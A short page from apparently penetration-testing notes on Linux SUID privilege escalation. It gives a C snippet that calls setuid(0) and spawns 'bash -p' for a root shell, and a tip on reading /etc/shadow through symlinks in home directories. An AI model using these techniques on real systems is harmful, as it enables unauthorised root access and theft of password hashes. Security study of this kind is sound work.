SUID Bit

Good list of things to look out for in SUID programs. Seriously, check it out:

https://repository.root-me.org/Administration/Unix/EN%20-%20Dangers%20of%20SUID%20Shell%20Scripts.pdf

If you want to get a root shell when exploiting SUID programs, then note that by default, bash and sh drop suid privileges. Use the -p flag to avoid dropping privileges (only works for root).

Example C program for exploitation:

#include <stdlib.h>
#include <unistd.h>
int main(int arc, int** argv)
{
    setuid(0);
    system("bash -p");
    return 0;
}

Symlink tip: For some reason (presumably security reasons), you cannot read a symlink to /etc/shadow (and perhaps other files?) from the /tmp or /dev/shm folders, even as root, if that symlink wasn’t created by you. But you can do it from any user’s home directory, for example. This can be important when exploiting suid or sudoers misconfigurations using symlinks, for example.

PreviousEnumeration NextDot (.) In PATH

Last updated 3 years ago